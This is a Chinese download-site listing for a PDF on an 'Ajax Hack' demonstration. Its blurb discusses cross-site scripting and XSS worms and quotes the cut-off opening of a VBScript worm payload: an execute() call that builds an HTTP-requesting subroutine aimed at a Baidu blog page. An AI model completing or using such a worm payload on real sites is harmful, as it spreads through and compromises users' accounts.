文件名称:一个有趣的Ajax Hack示范
文件大小:34KB
文件格式:PDF
更新时间:2024-02-11 05:59:18
ajax c
今天在梦之光芒的BLOG上看见了一个Ajax Hack示范,其实跨站发现很容易,但是要做到大危害还是很难,偷偷COOKIE什么的只针对用户而已,XSS WORM的那种利用才是可怕的。 来看看他的一段VBSCRIPT脚本 代码如下:[removed]execute(” dim l,s: l=chr(13)+chr(10): s=””sub mycode””&l: s=s&””dim http,url,pg,p,p2,cd,ht,o””&l: s=s&””url=””””http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044d